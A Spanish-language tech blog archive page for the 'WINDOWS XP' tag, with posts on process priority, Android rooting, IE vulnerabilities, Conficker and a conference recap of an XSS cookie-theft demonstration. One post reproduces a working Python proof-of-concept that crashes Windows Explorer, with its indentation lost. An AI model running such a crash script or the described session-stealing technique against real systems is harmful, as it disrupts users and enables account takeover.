Mostrando las entradas con la etiqueta WINDOWS XP. Mostrar todas las entradas
Mostrando las entradas con la etiqueta WINDOWS XP. Mostrar todas las entradas

lunes, 18 de marzo de 2013

Tip: Cómo aumentar el rendimiento de tu PC/Servidor al instante

¿Tu equipo está ejecutando un proceso y éste la vuelve extremadamente lenta, necesitas continuar utilizando el equipo y también continuar ejecutando el proceso?

Bueno, bajo estas circunstancias normalmente la opción más natural sería terminar el proceso, sin embargo, ésto podría obtener resultados no deseados. 

Para solucionar este problema, los sistemas operativos ofrecen la posibilidad de asignar quotas de uso de CPU a ciertos procesos. 

Lo más recomendable es reducir la prioridad del proceso para que no consuma la totalidad del CPU y así continuar operando el equipo, claro está que el proceso tardará más tiempo en terminar su tarea.

Para asignar la prioridad de cada uno de los procesos que se ejecutan en el equipo es necesario contar con los permisos para ello, y en cada sistema operativo varía.



Windows XP Profesional

Para Windows XP Profesional, el administrador de tareas permite asignar el nivel de prioridad a cada proceso mediante el uso de un menu contextual, como se muestra en la imagen anterior.

En linux, para cambiar la prioridad de un proceso que se está ejecutando se utiliza el comandi renice pero se debe contar con privilegios de root, para administrar el sistema. Para complementar el uso de este comando, consultar los comandos nice, top y ps. Veamos un ejemplo del comando renice.

#renice -1 -p 2504 

donde renice es el comando para reasignar el uso de cpu.
+1 es para asignar más o menos prioridad, el límite es 20.
-p 2504 es el identificador del proceso, éste se puede obtener con el comando top, ps -l, etc.

Sin duda, el uso de CPU toma su mayor importancia cuando se ejecutan procesos más pesados para el sistema.


Relacionados:
http://www.manpagez.com/man/8/renice/


sábado, 12 de mayo de 2012

Unlock Root Android 2.1, 2.2, 2.3


Rootear Android es un proceso muy sencillo, con Unlock Root tenemos la posibilidad de instalar aplicaciones que requieren permisos de root (superusuario) y desde la aplicación podemos decidir, en qué momento conceder o denegar los permisos de root a cada app que instalemos en Android.

Además en compatible con los siguientes modelos:

  • HTC Sensation 
  • Galaxy Nexus (i9250) 
  • LG Optimus 3D (P920) 
  • HTC Wildfire S 
  • Galaxy Note (I9220) 
  • LG Optimus 2x 
  • HTC Desire S 
  • Galaxy S II (I9100) 
  • LG Optimus LET 
  • HTC Incredible S 
  • Galaxy S (I9000) 
  • LG Optimus Black 
  • LG Optimus PRO (c660h)
Entre otros.

Como se puede apreciar en la imagen de la aplicación, basta con Activar el modo de depuración USB (desde Ajustes/Aplicaciones/Desarrollo/Depuración USB) y conectarlo por medio de un cable USB a la computadora.

 Finalmente, al dar clic en el botón Root de Unlock Root comenzará el proceso de rooteo el cual finalizará después de algunos instantes y se reiniciará el celular con un nuevo icono de superuser en el menú de aplicaciones.

Se recomienda que antes de comenzar el proceso se aseguren de que el equipo cuente con la carga suficiente, y deben haber instalado los drivers de su equipo celular.

Enlace de descarga de Unlock Root
Compatible con: XP, Vista y Windows 7.

viernes, 30 de diciembre de 2011

Windows Explorer Denial Of Service (DOS)

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack

from win32com.shell import shell, shellcon
from os import mkdir

try:
mkdir("c:\\trigger_alt")
except:
print "[!] Trigger Directory Exists"
try:
mkdir("c:\\trigger_alt\\....")
except:
print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

jueves, 22 de abril de 2010

El filtro XSS de Internet Explorer 8 sigue siendo vulnerable

Los investigadores Eduardo Vela y David Lindsay han presentado, en el marco de la conferencia Black Hat Europa de este año, un nuevo método para ejecutar ataques de cross-site scripting a través de los filtros XSS de Internet Explorer 8.

Microsoft introdujo un mecanismo para filtrar ataques de cross-site scripting, concretamente los de "tipo 1" o no persistentes. Un cross-site scripting no persistente es la clase de ataque más común y extendida de este tipo de ataques.

El atacante manipula una URL insertando código malicioso que, de manera errónea, aprovechando una vulnerabilidad, el sitio web usará para generar una página que contendrá el código legítimo más el código introducido por el atacante.

La víctima que "inadvertidamente" use la URL proporcionada por el atacante, enviará una petición hacia el servidor web y este "reflejará" el código de vuelta hacia el cliente donde es usado por el navegador como si fuese código legítimo.

Es denominado no persistente ya que el servidor no almacena el código malicioso y es reflejado porqué en realidad es el mismo navegador el que va a enviar el ataque a través de la petición HTTP hacia el servidor web y éste de vuelta al navegador de la víctima.

La idea general del filtro XSS de Internet Explorer, es observar la secuencia solicitud-respuesta entre navegador y sitio web. A grandes rasgos, modifica el código que se recibe del servidor antes de que sea interpretado por el navegador, si detecta que la página recibida contiene código sospechoso enviado en una de las solicitudes del navegador. Básicamente, evita "reflejar" el código malicioso.

La base del mecanismo de neutralización de ataques del filtro es alterar el código malicioso. En caso de observar código sospechoso de vuelta al navegador, el filtro actúa antes de que se interprete la página, insertando o reemplazando caracteres en partes de ese código para impedir su ejecución transformándolo en código no válido.

Ya en su momento se hizo público una vulnerabilidad que aprovechaba el filtro XSS para producir este tipo de ataques. Microsoft liberó un boletín (MS10-002) en el que se corregía la vulnerabilidad. Aun así, se encontraron nuevas formas para revertir el uso del filtro y Microsoft volvió a reforzarlo en un nuevo boletín (MS10-018).

Lo que han mostrado los investigadores es que es no solo es posible evadir el filtro sino que sigue siendo posible efectuar ataques de cross-site scripting, incluso en sitios webs que no son vulnerables. Adicionalmente, el filtro también podría ser usado por el atacante para impedir la ejecución de scripts legítimos, posibilitando la evasión de mecanismos de seguridad propios del sitio web visitado.

David Ross de Microsoft, ha confirmado que publicarán un parche hacia el mes de junio para prevenir este tipo de ataque.

Más Información:

Abusing IE8s XSS Filters [PDF]
http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf

Guidance on Internet Explorer XSS Filter
http://blogs.technet.com/msrc/archive/2010/04/19/guidance-on-internet-explorer-xss-filter.aspx

jueves, 11 de marzo de 2010

Nuevo 0-day en Microsoft Internet Explorer

Microsoft informa de una vulnerabilidad en el navegador Internet Explorer que podría permitir a un atacante remoto ejecutar código arbitrario, con los permisos del usuario, a través de un sitio web especialmente manipulado.

La vulnerabilidad, a la que se le ha asignado el CVE-2010-0806, se encuentra en "iepeers.dll" y está causada por un puntero inválido al que se podría acceder, bajo ciertas condiciones, tras liberar el objeto apuntado.

Microsoft ha detectado y confirma que la vulnerabilidad está siendo explotada activamente. Se consideran vulnerables las versiones 6 y 7.

Se recomienda seguir las indicaciones de Microsoft a fin de minimizar el impacto. Microsoft está trabajando para publicar un parche que solucione esta vulnerabilidad.


Más Información:

Microsoft Security Advisory (981374)
http://www.microsoft.com/technet/security/advisory/981374.mspx

Security Advisory 981374 Released (blog MSRC)
http://blogs.technet.com/msrc/archive/2010/03/09/security-advisory-981374-released.aspx

domingo, 7 de marzo de 2010

Descubren un fallo en Windows con una década de antigüedad

Se ha encontrado una vulnerabilidad crítica en Windows que compromete todas las versiones del sistema operativo de Microsoft desde 2000.

La empresa 2X Software afirma haber encontrado una vulnerabilidad en el sistema operativo de Microsoft que podría utilizarse para realizar ataques de denegación de servicio en las ediciones de Windows de la última década.
Se trata, en opinión de la compañía, de un gran problema que pone en riesgo a decenas de millones de ordenadores de todo el mundo. “Este tipo de vulnerabilidad deja a los usuarios abiertos a ataques de denegación de servicio que pueden ser devastadores”, afirman desde 2X Software.
Según la compañía, Windows 2000, Windows XP (y XP Embedded), Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2 son vulnerables. Desde Microsoft han anunciado que están comprobando la información.


FUENTE: Itexpresso

viernes, 3 de abril de 2009

BitDefender crea una herramienta de eliminacion del virus Conficker o Downadup

El dia 1 de abril de 2009 se tenia programada la activacion de una de las variantes del Virus Conficker o Downadup el cual tiene la capacidad de crear botnets o redes de computadoras "Zombis" las cuales pueden recibir instrucciones de parte de los creadores del virus con la capacidad de realizar ataques de denegacion de servicio en masa o envio masivo de spam.

Muchos expertos han considerado a Conficker como uno de los virus mas desastrosos de los ultimos diez años.

La empresa de seguridad informatica BitDefender ha creado una herramienta de eliminacion del gusano Conficker.



Descargar herramienta de desinfeccion del virus

sábado, 9 de agosto de 2008

Todo un éxito la charla sobre seguridad Informatica


Cara de asombro de uno de los asistentes a la conferencia.
















Demostracion del funcionamiento del sistema operativo Linux en su variante de Slackware.


















En esta imagen se muestran los valores de sesiones de sitios web capturadas en una base de datos MySQL.

















Expositor demostrando la gravedad de una vulnerabilidad XSS en un sitio web.

















Un usuario guest o invitado puede dejar un comentario en el sitio vulnerable, e invitar al administrador a que visite su sitio web. De esa manera se recopilan los valores de la sesión almacenados en la cookie. Y posteriormente acceder al sitio con permisos de administrador.








El día 8 de Agosto de 2008 se concluyó el curso de computación: Windows e Internet realizado por el instructor Alfonso Cruz en la capital del Estado.
Durante la clausura del curso y como parte de las actividades programadas por el instructor, se realizó una conferencia de seguridad informática en el laboratorio del centro de cómputo #1 en Icatsin, el expositor Nesok demostró con ejemplos claros y sencillos las características de un ataque XSS o Cross Site Scripting y la importancia de mantener actualizados los sistemas web, así como validar los campos de entrada de datos a los sitios web.
Con un lenguaje técnico-basico se mantuvo entretenidos a los presentes, quienes con atención presenciaban las demostraciones de intrusiones en sistemas remotos.

Nesok como experto en seguridad, proporciona las siguientes recomendaciones para mantener un sitio seguro:
- Utilizar un protocolo seguro, para que los datos viajen encriptados a travez de la red.
- Mantener actualizados los CMS - Sistema de gestión de contenidos.
- Desactivar servicios que no se necesiten en el servidor.
- Filtrar peticiones get y post e strings requests.
- Encriptar los datos antes de enviarse en caso de no usar SSL - Secure Socket Layer.
- Usar reglas mod_rewrite con .htaccess como firewall.
- Realizar escaneos antirootkit en el servidor.
- Evitar dar clic en links - enlaces desconocidos.
- No loguearse como root por todo el sitio, sino sólo para labores de administración. En caso de publicación de noticias y contacto con el usuario: utilizar cuentas restringidas.
- Evitar instalar MODS o modificaciones innecesarias a los CMS.
- Etc.

Para los usuarios:
- Actualizar constantemente la version de su navegador y sistema operativo, así como aplicaciones antivirus o antispyware, etc.
- Verificar que el sitio visitado cuente con certificado de seguridad válido.
- No abrir correo electrónicos que procedan de extraños, eliminarlos inmediatamente.
- Activar el filtro antispam en el servidor de correos.
- Evitar activar las casillas de recordar contraseña.
- No dar clic en enlaces donde el texto del enlace no corresponda a la dirección real, sobre todo en casos de cuentas bancarias o logins en sitios.
- Si das clic en un enlace para visualizar un sitio web y se muestra un cuadro de diálogo para descargar un archivo, nunca dar clic en abrir.
- Al momento de descargar un adjunto, siempre escanearlo de virus antes de abrirlo.
- Programar un escaneo de virus regularmente cada 15-30 dias.
- Vaciar los archivos temporales y limpiar las cookies regularmente.
- Utilizar contraseñas de más de 8 caracteres (numeros y letras e inclusive caracteres especiales si la aplicación lo permite).
- Utilizar la cuenta de administración del sistema operativo sólo para dichas tareas. Crear una cuenta especial con bajos privilegios para el uso común: Navegar, realizar tareas, escuchar musica y visualizar videos, etc.
- En caso de utilizar programas del tipo P2P - Peer to Peer asegurarnos de los archivos que deseamos compartir.
- Etc.
Además se mencionaron otros sistemas operativos como Linux, Mac. Y ventajas de ellos.
Para los usuarios interesados en Slackware pueden visitar el enlace siguiente:
Para aquellos interesados en la distribución ubuntu:

Estos fueron algunos de los temas abordados en la conferencia, agradecemos la colaboración de Nesok y esperamos otra conferencia más.
;)

viernes, 9 de mayo de 2008

Microsoft reanuda distribución de Windows XP SP3

La espera para el tercer service pack de Windows XP ha terminado oficialmente, una vez más. Luego de que se suspendiera la distribución del tercer y último SP para XP debido a problemas de compatibilidad con la aplicación, Dynamics Retail Management System, Microsoft ha decidido reanudar la distribución de esta importante actualización a través del servicio de actualizaciones automáticas incorporado al sistema operativo y su centro de descargas.

Sin embargo, el problema que causó la incompatibilidad no ha sido solucionado. En vez de arreglar el problema, Microsoft ha puesto un filtro en el servicio de actualización Windows para evitar que las personas con la aplicación Microsoft Dynamics RMS descargue la actualización. Aparentemente, la compañía aun está trabajando en un parche que posiblemente será lanzado más adelante este mes.

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)